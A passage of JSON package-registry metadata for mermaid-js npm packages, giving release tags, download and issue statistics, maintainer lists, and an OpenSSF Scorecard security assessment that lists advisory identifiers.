pendencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.348Z","dependent_packages_count":1,"downloads":3970846,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":5.655723457343912,"dependent_repos_count":10.298590216448614,"dependent_packages_count":20.911788993680194,"stargazers_count":0.07937524506966775,"forks_count":0.46408732622300797,"docker_downloads_count":null,"average":7.481913047753079},"purl":"pkg:npm/%40mermaid-js/parser","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/parser","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/parser","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/parser/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fparser/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fparser/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fparser/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fparser/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2023-11-26T15:47:26.427Z","updated_at":"2023-11-26T15:47:26.427Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2023-11-26T15:47:26.520Z","updated_at":"2023-11-26T15:47:26.520Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2023-11-26T15:47:26.654Z","updated_at":"2023-11-26T15:47:26.654Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2023-11-26T15:47:26.735Z","updated_at":"2023-11-26T15:47:26.735Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2023-11-26T15:47:26.271Z","updated_at":"2023-11-26T15:47:26.271Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2023-11-26T15:47:26.161Z","updated_at":"2023-11-26T15:47:26.161Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8632902,"name":"@dwelle/mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":"dwelle","versions_count":2,"first_release_published_at":"2023-12-10T12:30:22.576Z","latest_release_published_at":"2023-12-10T12:46:58.687Z","latest_release_number":"10.8.1","last_synced_at":"2025-09-01T12:55:59.131Z","created_at":"2023-12-10T12:30:41.016Z","updated_at":"2025-09-01T14:17:51.257Z","registry_url":"https://www.npmjs.com/package/@dwelle/mermaid","install_command":"npm install @dwelle/mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.8.1"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"